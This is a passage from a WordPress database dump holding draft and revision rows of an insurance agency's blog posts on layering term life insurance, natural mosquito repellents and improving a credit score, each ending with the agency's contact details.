years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Termlifeadvice.com, 2018\r\n</span></em><em><span style=\"font-size: 8pt;\">2. NerdWallet, 2017</span></em>\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:18:43','2023-03-21 14:18:43','',436,'http://cmdev-site1.com/?p=450',0,'revision','',0),(451,3,'2023-03-21 14:19:32','2023-03-21 14:19:32','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality, and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<p style=\"padding-left: 320px;\">• $500,000 for his mortgage with 10 years left\r\n• $300,000 for his two children’s college expenses ($150,000 each)\r\n• $200,000 in the event of his death so Terri will be taken care of</p>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #333333;\">-</span></div>\r\n<div><span style=\"color: #333333;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" />\r\n\r\n-\r\n\r\n<strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\nWhen Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" />Term life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Termlifeadvice.com, 2018\r\n</span></em><em><span style=\"font-size: 8pt;\">2. NerdWallet, 2017</span></em>\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:19:32','2023-03-21 14:19:32','',436,'http://cmdev-site1.com/?p=451',0,'revision','',0),(452,3,'2023-03-21 14:20:38','2023-03-21 14:20:38','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nOne of the most common questions we hear in the insurance industry is, “How much coverage do I need?”\r\n\r\nWhen it comes to life insurance, there are two different types of policies: whole life and term life. A whole life insurance policy lives as long as you do while a term life insurance policy is active for a certain period of time.\r\n\r\nThe “one size fits all” phrase is not applicable to life insurance—coverage should be customized to where you are in your life. Your insurance needs to change as your life goes on.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Does it Mean to Layer Your Life Insurance Policies?</h3>\r\nLayering, or laddering, is a technique that has become quite popular in the life insurance industry. It occurs when a consumer buys a few different term life policies with different term lengths rather than one whole life policy or one large term life policy.\r\n\r\nIn some instances, the layering technique can save policyholders almost 30%!<sup>1</sup>\r\n\r\nWe see layering policies when consumers have multiple reasons to buy a term life policy such as covering a mortgage, leaving dependents with a benefit, or general coverage for “just in case” purposes.\r\n\r\nLayering life insurance is not recommended for everyone. It may be unjustifiable for a single male in his mid-20s who makes $55,000 a year to take out three term life insurance policies.\r\n\r\nNot only would it be questionable to the insurance company why this person would need so much coverage, but they would also have a concern with his ability to consistently pay all the premiums.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Cons of Layering Your Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Most insurance policies have a few different fees that cover things such as sales charges, mortality, and expense risk charges, monthly per thousand charges, or general administration fees. When you ladder your insurance, you may be subject to paying multiple fees for each policy.</li>\r\n 	<li>While it’s encouraged to get a head start on your coverage needs, if you aren’t sure of your future financial obligations, you could be excessively spending on multiple policies.</li>\r\n 	<li>Having less insurance in your later years could backfire if you need additional money to purchase another house or deal with an emergency.</li>\r\n 	<li>Should your spouse ever need to file a claim, he or she will need to file multiple claims and present a death certificate several times since you would have multiple policies.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Pros of Layering Life Insurance Policies</h3>\r\n<ul>\r\n 	<li>Because term life insurance is temporary and typically has no cash value, it can cost three to 10 times less than a whole life insurance policy.<sup>2</sup></li>\r\n 	<li>A term life policy tends to be more transparent because it offers coverage over a set period of time, which consumers pay in previously-defined regular payments. Term life insurance gives you one product that does one thing.</li>\r\n 	<li>Term life policies give the consumer more control over his or her purchased coverage. Additionally, when your financial obligations change as your life goes on, you can customize your coverage to best fit your needs.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Layering Term Life Example</h3>\r\nLet’s see how our fictional friends Larry and Terri layered their term life insurance policies. Larry and Terri are married and in their mid-30s with two young children and a suburban home purchased at $500,000.\r\n\r\nLarry is a successful real estate agent while Terri provides child care for their two young children.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladders-example1.png\" alt=\"Layering Term Life Insurance Could Save You Money | Globe Life\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>Larry is looking into life insurance and needs:</strong>\r\n<p style=\"padding-left: 320px;\">• $500,000 for his mortgage with 10 years left\r\n• $300,000 for his two children’s college expenses ($150,000 each)\r\n• $200,000 in the event of his death so Terri will be taken care of</p>\r\n&nbsp;\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\n<img class=\"article_image alignright\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder1.png\" alt=\"Term Life Insurance Layering, Chart 1\" width=\"300\" height=\"300\" />\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<strong>We encourage Larry to layer three term life policies as shown below:</strong>\r\n\r\nInstead of purchasing one term life policy for $1,000,000 for 30 years at a fixed rate, we encourage Larry to purchase three separate term life policies:\r\n<ul>\r\n 	<li>One policy for $500,000 for 10 years</li>\r\n 	<li>One policy for $300,000 for 15 years</li>\r\n 	<li>One policy for $200,000 for 30 years</li>\r\n</ul>\r\n<span style=\"color: #ffffff;\">-</span>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n<div><span style=\"color: #ffffff;\">-</span></div>\r\n</div>\r\n<div>\r\n\r\n<strong>When Larry purchases three separate policies versus one large policy, he saves almost 34%! Let’s see how this is possible.</strong>\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/ladder2.png\" alt=\"Term Life Insurance Layering, Chart 2\" width=\"300\" height=\"300\" /><span style=\"color: #ffffff;\">-</span>\r\n\r\nTerm life insurance layering could possibly be a sound investment for some families, especially if their insurance needs decline as they age.\r\n\r\nHowever, the layering strategy could be highly complicated for those just starting out.\r\n\r\nWhen layering your life insurance, we highly recommend getting professional help to guide you through the process and ensure you’re getting the best coverage at the best prices.\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n<span style=\"color: #ffffff;\">-</span>\r\n\r\n&nbsp;\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Termlifeadvice.com, 2018\r\n</span></em><em><span style=\"font-size: 8pt;\">2. NerdWallet, 2017</span></em>\r\n\r\n</div>','Layering Term Life Insurance Could Save You Money','','inherit','closed','closed','','436-revision-v1','','','2023-03-21 14:20:38','2023-03-21 14:20:38','',436,'http://cmdev-site1.com/?p=452',0,'revision','',0),(453,3,'2023-03-21 14:38:41','0000-00-00 00:00:00','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nAs news continues to emerge about the different mosquito viruses that are dangerous and prevalent, it’s easy to feel anxiety in the great outdoors.\r\n\r\nAlthough the thought of being bitten by an infected mosquito is worrisome, the thought of using insect repellents that contain harmful pesticide ingredients may be also. Certain pesticides can cause irritation to the skin and have harmful side effects.\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/naturalmosquito.jpg\" alt=\"Natural Mosquito Repellants | Globe Life\" width=\"220\" />\r\n\r\nDue to the potential side effects of mosquito repellent, many have opted for natural repellents.\r\n\r\nYou can easily make repellents to spray on yourself as well as your yard, and natural bug sprays can often last longer than store bought mosquito repellent.\r\n\r\nOne of the most common natural mosquito repellents is lemon eucalyptus oil. Lemon eucalyptus oil has been useful as a natural mosquito repellent since the 1940s and has been approved by the Centers for Disease Control and Prevention as an effective mosquito repellent.\r\n\r\nHowever, researchers from the University of Florida have cautioned against using the oil on children under three.\r\n\r\nA June 2006 Consumer Report article noted that after testing, <strong>lemon eucalyptus</strong> was the best non-DEET (diethyltoluamide) mosquito repellent.\r\n\r\nStudies have also shown that <strong>lemon eucalyptus oil</strong> used as a repellent can provide 120.1 minutes of protection against mosquitos as compared to a name-brand bug spray for kids containing a low-dose DEET, which keeps bugs at bay for approximately 88.4 minutes.\r\n\r\nA higher adult dose of DEET prevents mosquitos from biting for a longer period of time.\r\n\r\nAnother popular natural method that smells good and repels mosquitos is <strong>lavender</strong>. Lavender acts as an analgesic and antiseptic, meaning it has calming and soothing effects.\r\n\r\nYou can add lavender to your flower beds outside or it can be grown in planters inside. When you crush the flowers of the lavender plant, it produces a fragrance and oil that will prevent mosquito bites when added to the skin.\r\n\r\n<strong>Cinnamon oil</strong> used as a cooking ingredient or to make your home smell good can also act as a mosquito repellent.\r\n\r\nNot only is cinnamon oil useful to kill off mosquito eggs, but it can be used against adult mosquitoes, especially the Asian Tiger mosquito. Be careful, however, when applying to the skin, as it can be irritating. A diluted mix with water is best.\r\n\r\n<strong>Thyme</strong>, another great cooking ingredient, can also be used for repelling mosquitoes when used in oil form. In studies performed, using thyme oil had an actual protection rate of 91 percent.\r\n\r\n<strong>Catnip</strong>, a white and pink flower, can serve as a mosquito repellent when extract and oil are taken from the bruised leaves. Research shows that the oil from the plant can repel mosquitoes successfully for two to three hours.\r\n\r\nFurther studies from Iowa State University revealed that catnip was found to be ten times more effective than DEET at repelling mosquitoes.\r\n\r\n<strong>Citronella oil</strong> is derived from the leaves and stems of different species of Cymbopogon (<strong>lemongrass</strong>).\r\n\r\nThis essential oil is one of the most common oils used in aromatherapy and can not only be used as a mosquito repellent, but can also be used to help treat and prevent colds, fevers, and headaches.\r\n\r\nCitronella contains antiseptic properties and is used in soaps, household cleaners, and detergents, and for treating insect bites.\r\n\r\nRegardless of which mosquito repellent you decide to try, make sure that you dilute your choice with water or a lotion before applying it to a small section of your skin, and watch for any skin sensitivities or allergic reactions.\r\n\r\nIf your skin does become irritated, clean the area and check with your physician or your local poison control center.\r\n\r\nConsult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713-254-3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a> to find out more information about your life insurance options.','Natural Mosquito Repellants','','draft','open','open','','','','','2023-03-21 14:38:41','2023-03-21 14:38:41','',0,'http://cmdev-site1.com/?p=453',0,'post','',0),(454,3,'2023-03-21 14:27:12','2023-03-21 14:27:12','Super macro mosquito sucking blood','Super macro mosquito sucking blood','','inherit','open','closed','','super-macro-mosquito-sucking-blood','','','2023-03-21 14:27:26','2023-03-21 14:27:26','',453,'http://cmdev-site1.com/wp-content/uploads/2023/03/Super-macro-mosquito-1000x667-1.jpg',0,'attachment','image/jpeg',0),(455,3,'2023-03-21 14:34:20','2023-03-21 14:34:20','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nAs news continues to emerge about the different mosquito viruses that are dangerous and prevalent, it’s easy to feel anxiety in the great outdoors.\r\n\r\nAlthough the thought of being bitten by an infected mosquito is worrisome, the thought of using insect repellents that contain harmful pesticide ingredients may be also. Certain pesticides can cause irritation to the skin and have harmful side effects.\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/naturalmosquito.jpg\" alt=\"Natural Mosquito Repellants | Globe Life\" width=\"220\" />\r\n\r\nDue to the potential side effects of mosquito repellent, many have opted for natural repellents.\r\n\r\nYou can easily make repellents to spray on yourself as well as your yard, and natural bug sprays can often last longer than store bought mosquito repellent.\r\n\r\nOne of the most common natural mosquito repellents is lemon eucalyptus oil. Lemon eucalyptus oil has been useful as a natural mosquito repellent since the 1940s and has been approved by the Centers for Disease Control and Prevention as an effective mosquito repellent.\r\n\r\nHowever, researchers from the University of Florida have cautioned against using the oil on children under three.\r\n\r\nA June 2006 Consumer Report article noted that after testing, lemon eucalyptus was the best non-DEET (diethyltoluamide) mosquito repellent.\r\n\r\nStudies have also shown that lemon eucalyptus oil used as a repellent can provide 120.1 minutes of protection against mosquitos as compared to a name-brand bug spray for kids containing a low-dose DEET, which keeps bugs at bay for approximately 88.4 minutes.\r\n\r\nA higher adult dose of DEET prevents mosquitos from biting for a longer period of time.\r\n\r\nAnother popular natural method that smells good and repels mosquitos is lavender. Lavender acts as an analgesic and antiseptic, meaning it has calming and soothing effects.\r\n\r\nYou can add lavender to your flower beds outside or it can be grown in planters inside. When you crush the flowers of the lavender plant, it produces a fragrance and oil that will prevent mosquito bites when added to the skin.\r\n\r\nCinnamon oil used as a cooking ingredient or to make your home smell good can also act as a mosquito repellent.\r\n\r\nNot only is cinnamon oil useful to kill off mosquito eggs, but it can be used against adult mosquitoes, especially the Asian Tiger mosquito. Be careful, however, when applying to the skin, as it can be irritating. A diluted mix with water is best.\r\n\r\nThyme, another great cooking ingredient, can also be used for repelling mosquitoes when used in oil form. In studies performed, using thyme oil had an actual protection rate of 91 percent.\r\n\r\nCatnip, a white and pink flower, can serve as a mosquito repellent when extract and oil are taken from the bruised leaves. Research shows that the oil from the plant can repel mosquitoes successfully for two to three hours.\r\n\r\nFurther studies from Iowa State University revealed that catnip was found to be ten times more effective than DEET at repelling mosquitoes.\r\n\r\nCitronella oil is derived from the leaves and stems of different species of Cymbopogon (lemongrass).\r\n\r\nThis essential oil is one of the most common oils used in aromatherapy and can not only be used as a mosquito repellent, but can also be used to help treat and prevent colds, fevers, and headaches.\r\n\r\nCitronella contains antiseptic properties and is used in soaps, household cleaners, and detergents, and for treating insect bites.\r\n\r\nRegardless of which mosquito repellent you decide to try, make sure that you dilute your choice with water or a lotion before applying it to a small section of your skin, and watch for any skin sensitivities or allergic reactions.\r\n\r\nIf your skin does become irritated, clean the area and check with your physician or your local poison control center.\r\n\r\nConsult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713-254-3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a> to find out more information about your life insurance options.','Natural Mosquito Repellants','','inherit','closed','closed','','453-revision-v1','','','2023-03-21 14:34:20','2023-03-21 14:34:20','',453,'http://cmdev-site1.com/?p=455',0,'revision','',0),(456,3,'2023-03-21 14:38:41','2023-03-21 14:38:41','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nAs news continues to emerge about the different mosquito viruses that are dangerous and prevalent, it’s easy to feel anxiety in the great outdoors.\r\n\r\nAlthough the thought of being bitten by an infected mosquito is worrisome, the thought of using insect repellents that contain harmful pesticide ingredients may be also. Certain pesticides can cause irritation to the skin and have harmful side effects.\r\n\r\n<img class=\"article_image alignleft\" src=\"https://e806.globelifeinsurance.com/images/article_images/naturalmosquito.jpg\" alt=\"Natural Mosquito Repellants | Globe Life\" width=\"220\" />\r\n\r\nDue to the potential side effects of mosquito repellent, many have opted for natural repellents.\r\n\r\nYou can easily make repellents to spray on yourself as well as your yard, and natural bug sprays can often last longer than store bought mosquito repellent.\r\n\r\nOne of the most common natural mosquito repellents is lemon eucalyptus oil. Lemon eucalyptus oil has been useful as a natural mosquito repellent since the 1940s and has been approved by the Centers for Disease Control and Prevention as an effective mosquito repellent.\r\n\r\nHowever, researchers from the University of Florida have cautioned against using the oil on children under three.\r\n\r\nA June 2006 Consumer Report article noted that after testing, <strong>lemon eucalyptus</strong> was the best non-DEET (diethyltoluamide) mosquito repellent.\r\n\r\nStudies have also shown that <strong>lemon eucalyptus oil</strong> used as a repellent can provide 120.1 minutes of protection against mosquitos as compared to a name-brand bug spray for kids containing a low-dose DEET, which keeps bugs at bay for approximately 88.4 minutes.\r\n\r\nA higher adult dose of DEET prevents mosquitos from biting for a longer period of time.\r\n\r\nAnother popular natural method that smells good and repels mosquitos is <strong>lavender</strong>. Lavender acts as an analgesic and antiseptic, meaning it has calming and soothing effects.\r\n\r\nYou can add lavender to your flower beds outside or it can be grown in planters inside. When you crush the flowers of the lavender plant, it produces a fragrance and oil that will prevent mosquito bites when added to the skin.\r\n\r\n<strong>Cinnamon oil</strong> used as a cooking ingredient or to make your home smell good can also act as a mosquito repellent.\r\n\r\nNot only is cinnamon oil useful to kill off mosquito eggs, but it can be used against adult mosquitoes, especially the Asian Tiger mosquito. Be careful, however, when applying to the skin, as it can be irritating. A diluted mix with water is best.\r\n\r\n<strong>Thyme</strong>, another great cooking ingredient, can also be used for repelling mosquitoes when used in oil form. In studies performed, using thyme oil had an actual protection rate of 91 percent.\r\n\r\n<strong>Catnip</strong>, a white and pink flower, can serve as a mosquito repellent when extract and oil are taken from the bruised leaves. Research shows that the oil from the plant can repel mosquitoes successfully for two to three hours.\r\n\r\nFurther studies from Iowa State University revealed that catnip was found to be ten times more effective than DEET at repelling mosquitoes.\r\n\r\n<strong>Citronella oil</strong> is derived from the leaves and stems of different species of Cymbopogon (<strong>lemongrass</strong>).\r\n\r\nThis essential oil is one of the most common oils used in aromatherapy and can not only be used as a mosquito repellent, but can also be used to help treat and prevent colds, fevers, and headaches.\r\n\r\nCitronella contains antiseptic properties and is used in soaps, household cleaners, and detergents, and for treating insect bites.\r\n\r\nRegardless of which mosquito repellent you decide to try, make sure that you dilute your choice with water or a lotion before applying it to a small section of your skin, and watch for any skin sensitivities or allergic reactions.\r\n\r\nIf your skin does become irritated, clean the area and check with your physician or your local poison control center.\r\n\r\nConsult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713-254-3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a> to find out more information about your life insurance options.','Natural Mosquito Repellants','','inherit','closed','closed','','453-revision-v1','','','2023-03-21 14:38:41','2023-03-21 14:38:41','',453,'http://cmdev-site1.com/?p=456',0,'revision','',0),(457,3,'2023-03-21 14:48:15','0000-00-00 00:00:00','<span style=\"font-size: 8pt;\">By Lucille Reed\r\n<span style=\"color: #ffffff;\">-</span></span>\r\n<h3>4 Tips To Improve Your Credit Score</h3>\r\nYou’ve heard of credit scores, but do you know yours? Your credit score is a predictor that helps financial institutions determine how likely it is that you’ll repay the money lent to you.\r\n\r\nMany people don’t realize that knowing your credit score is as important as knowing your bank balance. Even many insurance companies consider your score when determining your insurance premium.\r\n\r\nLuckily, keeping tabs on your score is easier than you think.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>1. Request a Free Credit Report</h3>\r\nPaying attention and knowing what your credit looks like is key. You can request a free credit report once a year at <a href=\"https://www.annualcreditreport.com/\" target=\"_blank\" rel=\"noopener noreferrer\">www.annualcreditreport.com</a> or at your local bank or credit union.\r\n\r\nReview the report for any mistakes or accounts that are incorrect. It isn’t unusual to find mistakes, and many people miss this opportunity to help increase their scores by removing erroneous information.\r\n\r\nOnce you see all of your debts, then you can begin to make some changes.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>2. Reduce Your Debt</h3>\r\nAfter reviewing your free credit report, identify the smallest debts and pay those down first. Even if you can only budget an additional $10 towards each bill payment, the effort is what matters here.\r\n\r\nIf you have big credit card balances, call your credit card companies to ask for your limit to be raised. The point isn’t to charge more, but instead, to increase your debt ratio, which is basically the difference between what you owe and what you’ve been allowed to borrow.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>3. Set Payment Reminders</h3>\r\nMissing payments and making late payments are quick ways to lower your score. Set payment reminders or auto-deduct when and where you can so you can avoid the possibility of late payments.\r\n\r\nIf you plan to always pay the minimum payment on a credit card, visit their site to set up recurring payments. If you find yourself rushing to the bank to make a loan payment on or after the due date, inquire about setting up auto-deductions.\r\n\r\nYou can often choose the day the funds will be drafted out of your account. Many people choose the day after payday to ensure funds are available.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>4. Open A Credit Card</h3>\r\nOnce a free credit report is requested and reviewed, many people find that their issue isn’t bad credit, but actually a lack of credit history.\r\n\r\nIn this instance, it may be a good idea to visit your local bank or credit union and inquire about opening a line of credit for the purpose of improving your credit history.\r\n\r\nThe key is to use it for small purchases and then pay it back each month just to keep the account open and the balance low. In 6-8 months, ask for a new credit report and see the difference.\r\n\r\nConsult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a> to find more information about your life insurance options.','4 Tips To Improve Your Credit Score','','draft','open','open','','','','','2023-03-21 14:48:15','2023-03-21 14:48:15','',0,'http://cmdev-site1.com/?p=457',0,'post','',0),(458,3,'2023-03-21 14:46:17','2023-03-21 14:46:17','<span style=\"font-size: 8pt;\">By Lucille Reed\r\n<span style=\"color: #ffffff;\">-</span></span>\r\n<h3>4 Tips To Improve Your Credit Score</h3>\r\nYou’ve heard of credit scores, but do you know yours? Your credit score is a predictor that helps financial institutions determine how likely it is that you’ll repay the money lent to you.\r\n\r\nMany people don’t realize that knowing your credit score is as important as knowing your bank balance. Even many insurance companies consider your score when determining your insurance premium. Luckily, keeping tabs on your score is easier than you think.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>1. Request a Free Credit Report</h3>\r\nPaying attention and knowing what your credit looks like is key. You can request a free credit report once a year at <a href=\"https://www.annualcreditreport.com/\" target=\"_blank\" rel=\"noopener noreferrer\">www.annualcreditreport.com</a> or at your local bank or credit union.\r\n\r\nReview the report for any mistakes or accounts that are incorrect. It isn’t unusual to find mistakes, and many people miss this opportunity to help increase their scores by removing erroneous information. Once you see all of your debts, then you can begin to make some changes.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>2. Reduce Your Debt</h3>\r\nAfter reviewing your free credit report, identify the smallest debts and pay those down first. Even if you can only budget an additional $10 towards each bill payment, the effort is what matters here.\r\n\r\nIf you have big credit card balances, call your credit card companies to ask for your limit to be raised. The point isn’t to charge more, but instead, to increase your debt ratio, which is basically the difference between what you owe and what you’ve been allowed to borrow.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>3. Set Payment Reminders</h3>\r\nMissing payments and making late payments are quick ways to lower your score. Set payment reminders or auto-deduct when and where you can so you can avoid the possibility of late payments.\r\n\r\nIf you plan to always pay the minimum payment on a credit card, visit their site to set up recurring payments. If you find yourself rushing to the bank to make a loan payment on or after the due date, inquire about setting up auto-deductions.\r\n\r\nYou can often choose the day the funds will be drafted out of your account. Many people choose the day after payday to ensure funds are available.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>4. Open A Credit Card</h3>\r\nOnce a free credit report is requested and reviewed, many people find that their issue isn’t bad credit, but actually a lack of credit history. In this instance, it may be a good idea to visit your local bank or credit union and inquire about opening a line of credit for the purpose of improving your credit history.\r\n\r\nThe key is to use it for small purchases and then pay it back each month just to keep the account open and the balance low. In 6-8 months, ask for a new credit report and see the difference.\r\n\r\nConsult one of our licensed insurance professionals at <a href=\"tel:17132543439\" 